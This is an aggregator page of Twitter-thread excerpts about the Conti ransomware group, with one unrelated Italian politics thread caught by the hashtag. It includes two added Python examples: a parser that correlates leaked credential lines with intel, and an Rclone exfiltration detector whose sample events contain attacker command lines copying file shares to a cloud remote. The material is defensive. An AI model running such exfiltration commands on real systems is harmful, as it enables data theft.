Discover and read the best of Twitter Threads about #conti

Most recent (9)

Thread on #APT grps, #hacktivists, #Ransomware gangs with their ‘likely’ associations (as per TTPs and reports) that are playing a significant role in the impending #Ukraine #Russian conflict. Correct me if I am wrong or missing anyone. 1/
Firstly on Russian 🇷🇺side there are #GhostWriter (#Belarus Govt Backed) #CozyBear (Russian Foreign Intel aka #SVR) #UNC1151 (Minsk based) #FancyBears & #SandWorm (Russian Military Intel aka #GRU) #Turla and #Gamaredon (Russian Internal Intel #FSB Former KGB) 2/
Read 7 tweets
The #ContiLeaks contained some messages consisting of IP:Username:pass combinations for #Conti infrastructure.
This allows us to connect certain #Trickbot activity with the #Conti group:

1/x Image
The IPs in the image are the following:
117.252.69[.]134
117.252.68[.]15
116.206.153[.]212
103.78.13[.]150
103.47.170[.]131
103.47.170[.]130
118.91.190[.]42
117.197.41[.]36
117.222.63[.]77
117.252.69[.]210

2/x
Using @MaltegoHQ together with OTX/AlienVault and
@virustotal integration, we are able to connect several of these IPs to #Trickbot activity:

3/x Image
Read 8 tweets
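The thread above pivots from leaked IP:Username:pass lines to a threat-intel lookup. The following is an added example, not code from the thread author, showing the offline half of that workflow: parsing credential lines in that shape (defanged or not), refanging the IPs, correlating them against an indicator set, and flagging passwords reused across hosts. The credential lines and the INTEL_FEED dictionary are constructed here as a stand-in for OTX/VirusTotal results; only the IPs are taken from the thread.

```python
"""
Extract IP:user:pass combos from a leaked chat dump, normalise the IPs and
correlate them with a local indicator set (stand-in for OTX / VirusTotal).
"""
import ipaddress
import re
from collections import defaultdict
from typing import Dict, List, NamedTuple, Set

# Constructed sample lines in the IP:Username:pass shape the thread describes.
# IPs come from the thread; usernames and passwords are made up.
LEAKED_LINES = """
117.252.69[.]134:root:Qwerty123!
117.252.68.15:admin:hunter2
116.206.153[.]212 : operator : P@ssw0rd
garbage line without creds
103.78.13[.]150:root:
117.252.69[.]210:root:Qwerty123!
"""

# Constructed stand-in for a threat-intel feed: indicator -> tags
INTEL_FEED: Dict[str, Set[str]] = {
    "117.252.69.134": {"trickbot", "c2"},
    "116.206.153.212": {"trickbot"},
    "198.51.100.7": {"emotet"},
}


class Cred(NamedTuple):
    ip: str
    user: str
    password: str


# Common defanging styles: 1.2.3[.]4, 1.2.3(.)4, 1.2.3{.}4
DEFANG_RE = re.compile(r"\[\.\]|\(\.\)|\{\.\}")
# ip : user : password, tolerating spaces around the separators and an empty password
CRED_RE = re.compile(r"^\s*(?P<ip>[^:\s]+)\s*:\s*(?P<user>[^:\s]*)\s*:\s*(?P<pw>.*?)\s*$")


def refang(text: str) -> str:
    """Turn defanged notation back into a plain dotted IP string."""
    return DEFANG_RE.sub(".", text)


def defang(ip: str) -> str:
    """Bracket the last dot so the IP is not clickable in a report."""
    head, _, tail = ip.rpartition(".")
    return f"{head}[.]{tail}"


def parse_creds(dump: str) -> List[Cred]:
    """Keep only lines that carry a real IP literal in the first field."""
    creds: List[Cred] = []
    for line in dump.splitlines():
        m = CRED_RE.match(line)
        if not m:
            continue
        ip = refang(m.group("ip"))
        try:
            ipaddress.ip_address(ip)  # reject hostnames, typos, partial IPs
        except ValueError:
            continue
        creds.append(Cred(ip, m.group("user"), m.group("pw")))
    return creds


def correlate(creds: List[Cred], feed: Dict[str, Set[str]]) -> Dict[str, List[str]]:
    """Map each leaked IP that appears in the feed to its sorted tag list."""
    return {c.ip: sorted(feed[c.ip]) for c in creds if c.ip in feed}


def shared_passwords(creds: List[Cred]) -> Dict[str, List[str]]:
    """Non-empty passwords reused on more than one host: useful pivot points."""
    by_pw: Dict[str, List[str]] = defaultdict(list)
    for c in creds:
        if c.password:
            by_pw[c.password].append(c.ip)
    return {pw: ips for pw, ips in by_pw.items() if len(ips) > 1}


if __name__ == "__main__":
    found = parse_creds(LEAKED_LINES)
    for ip, tags in correlate(found, INTEL_FEED).items():
        print(f"{defang(ip)} -> {', '.join(tags)}")
    for pw, ips in shared_passwords(found).items():
        print(f"password reused on {len(ips)} hosts: {[defang(i) for i in ips]}")
```

The feed dictionary is where a real OTX pulse or VirusTotal response would be loaded; everything else stays the same. Note that the lookup is exact-match on the IP, so a feed keyed by CIDR would need a separate `ipaddress.ip_network` containment check.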
NEW 🧵on Conti...

We published some news this week about Conti. In brief, a #Conti affiliate infiltrated the network of a healthcare provider that a different #ransomware threat actor had already penetrated.

The technical debt in healthcare is dangerous.

1/23
But Conti, in particular, attracts a particularly aggressive group of affiliates. And we have another, previously untold, Conti-adjacent story about one of their ransomware affiliates.

It serves as a cautionary tale that not all attackers are necessarily after a ransom. 2/23
This past January we were contacted by a customer in the Middle East to investigate a malware incident that began in mid-December 2021. The target, in the financial services industry, discovered lateral movement and backdoors in their network the week before New Year's Day. 3/23
Read 23 tweets
Last year, we got an anonymous tip that "a global cyber crime group acting on an FSB order has hacked one of your contributors. The only thing they were interested in was anything related to your @navalny investigation". We took enormous measures to upgrade our e-security (1/n)
We tried to figure out what that cyber-crime group was - that apparently takes orders from the FSB. The Russian invasion of Ukraine finally brought the answer. A pro-Ukraine hacker from that cyber-crime group leaked their internal chats. It's the #conti group.
Here is the chat between two conti hackers (h/t @HarioMenkel) Image
Read 4 tweets
Financially motivated cybercriminals usually stay away from politics, but when politics hits close to home, they strike back. In this thread, we share a quick recap of the most interesting initiatives and discussions about the #UkraineRussiaConflict on cybercrime forums. Image
A user on CrdClub proposed to organize a fundraiser to support the families and children in Ukraine. The author shared a BTC wallet that was issued by the forum’s admin specifically for this cause. Image
A user on Exploit published a post asking Russian citizens to participate in protests against the war. Other users commented that regardless of the forum’s rules, it is highly important to discuss the matter and state such opinions out loud. However, the thread was deleted. Image
Read 8 tweets
Yesterday, the U.S. Treasury Department announced extensive sanctions against Russian businesses and elites following the country’s invasion of Ukraine. This has prompted many to ask Chainalysis how Russia may attempt to use cryptocurrency to evade sanctions.
As is true in traditional finance, some may use crypto for sanctions evasion. But the inherent transparency of blockchains combined with Chainalysis data & tools gives governments and crypto businesses the ability to identify transactions by sanctioned entities and take action.
It’s unlikely that individuals designated in yesterday’s sanctions would move large quantities of crypto now. Russian elites and financial authorities have likely been preparing for sanctions, and would have carried out those transactions slowly over the past few months.
Read 12 tweets
[Thread]
Given the importance of the events under way in #Ukraine, we are opening a thread on articles covering the cyberattacks.

Feel free to send us your sources. The goal is to gather as much content as possible.

We start with "wiper" numerama.com/cyberguerre/86…
ANSSI is asking companies and government agencies to strengthen their defences.

lefigaro.fr/secteur/high-t…
Internet outage in Kharkiv (one of the first cities attacked).

numerama.com/politique/8653…
Read 48 tweets
[1/5]

LATEST NEWS: Both @CISAgov and @FBI just released an advisory on #Conti #ransomware, which they’ve recently observed being used to attack US and international organizations.

Learn more about Conti’s attack chain and tactics here 👉 research.trendmicro.com/3lOTxrx
[2/5]

#Conti operators use several methods to gain initial access like spear phishing and exploiting public-facing applications, followed by the use of Cobalt Strike. We investigated how Conti #ransomware operators used Cobalt Strike to launch attacks: research.trendmicro.com/3CDba4C
[3/5]

Aside from Cobalt Strike, #Rclone is another legitimate tool abused by Conti operators in their previous campaigns. We discuss some of the most commonly abused legitimate tools here 👉 research.trendmicro.com/2W8cNaS
Read 5 tweets
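The thread above names Rclone as a legitimate tool Conti operators abuse for exfiltration. The following is an added example, not code from the thread author or from Trend Micro, showing detection logic a SOC could run over process-creation events: it flags an Rclone `copy`/`sync`/`move` to an Rclone remote, a renamed Rclone binary (Sysmon's OriginalFileName still says `rclone.exe`), and use of a custom `--config` file. The four Sysmon-style key=value event lines are constructed; the field names follow Sysmon Event ID 1, but the log format itself is an assumption for the example.

```python
"""
Flag Rclone-based exfiltration in Sysmon-style process-creation events.
"""
import re
import shlex
from typing import Dict, List, Optional

# Constructed sample events (tab-separated key=value, Sysmon Event ID 1 field names).
SAMPLE_EVENTS = [
    "\t".join([r"Image=C:\Users\svc\AppData\Local\Temp\rclone.exe",
               r"OriginalFileName=rclone.exe",
               r'CommandLine=rclone.exe copy "\\fs01\finance" mega:dump --transfers 10 -q --ignore-existing --auto-confirm']),
    "\t".join([r"Image=C:\Windows\Temp\svchost.exe",          # rclone renamed to blend in
               r"OriginalFileName=rclone.exe",
               r"CommandLine=svchost.exe sync E:\Backups remote: --config C:\Windows\Temp\rc.conf"]),
    "\t".join([r"Image=C:\Program Files\rclone\rclone.exe",   # listing only, no transfer
               r"OriginalFileName=rclone.exe",
               r"CommandLine=rclone.exe lsd backup:"]),
    "\t".join([r"Image=C:\Windows\System32\svchost.exe",      # the real svchost
               r"OriginalFileName=svchost.exe",
               r"CommandLine=svchost.exe -k netsvcs -p"]),
]

RCLONE_VERBS = {"copy", "sync", "move", "copyto", "moveto"}
# Flags specific enough to Rclone that they identify it even when renamed
RCLONE_FLAGS = {"--transfers", "--multi-thread-streams", "--ignore-existing",
                "--auto-confirm", "--no-check-certificate", "--bwlimit"}
# Rclone remote syntax is "name:" or "name:path". Single-letter names are
# skipped on purpose so Windows drive letters (E:\Backups) do not match.
REMOTE_RE = re.compile(r"^[A-Za-z0-9_\-]{2,}:")


def parse_event(line: str) -> Dict[str, str]:
    """Split a tab-separated key=value line into a dict (first '=' wins)."""
    fields: Dict[str, str] = {}
    for part in line.split("\t"):
        key, sep, value = part.partition("=")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def tokenize(cmdline: str) -> List[str]:
    # posix=False leaves Windows backslashes alone; strip the retained quotes afterwards
    return [t.strip('"') for t in shlex.split(cmdline, posix=False)]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(event: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Return an alert dict for suspicious Rclone use, or None."""
    image = basename(event.get("Image", ""))
    orig = event.get("OriginalFileName", "").lower()
    argv = tokenize(event.get("CommandLine", ""))
    if not argv:
        return None
    looks_like_rclone = (image == "rclone.exe" or orig == "rclone.exe"
                         or bool(RCLONE_FLAGS & set(argv)))
    if not looks_like_rclone:
        return None
    verb = next((a.lower() for a in argv[1:] if a.lower() in RCLONE_VERBS), "")
    remotes = [a for a in argv[1:] if REMOTE_RE.match(a)]
    reasons: List[str] = []
    transfer = bool(verb and remotes)
    if transfer:
        reasons.append(f"rclone {verb} to remote {remotes[0]}")
    if orig == "rclone.exe" and image != "rclone.exe":
        reasons.append(f"rclone renamed to {image}")
    if "--config" in argv:
        reasons.append("custom config file")
    if not reasons:
        return None
    return {"image": image, "severity": "high" if transfer else "medium", "reasons": reasons}


def scan(lines: List[str]) -> List[Dict[str, object]]:
    return [a for a in (analyze(parse_event(l)) for l in lines) if a]


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert["severity"], alert["image"], "; ".join(alert["reasons"]))
```

The `lsd backup:` event is deliberately not alerted: listing a remote is reconnaissance rather than exfiltration, and alerting on it in an environment with legitimate Rclone use would be noisy. If Rclone has no business being on your estate at all, drop the `reasons` check and alert on `looks_like_rclone` alone.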
#Conte goes up to the Quirinale for the #ConteTer, but in parliament he does not get the votes. It is the hour of the #GovernoDraghi.

The former #Bce president receives the mandate from the President of the Republic and gives his programme speech, talking about future #generazioni, #produttività, #sostenibilità.
Humility and pragmatism. Of #ZombieEconomics and #DebitoCattivo.

In the Chamber and the Senate they clap until their hands are raw; the newspapers carry ecstatic comments and long-winded biographies that start at the Jesuit college and pass through the Britannia.

The country is on a #LunaDiMiele.
A honeymoon with pro-Draghi polls that would make Xi Jinping in the Politburo envious.

He wins the confidence vote with Bulgarian-style percentages: three quarters of parliament voted for him. The only rare exceptions, looked upon with contempt by the journalists in the Transatlantico, are just a couple of parties
Read 17 tweets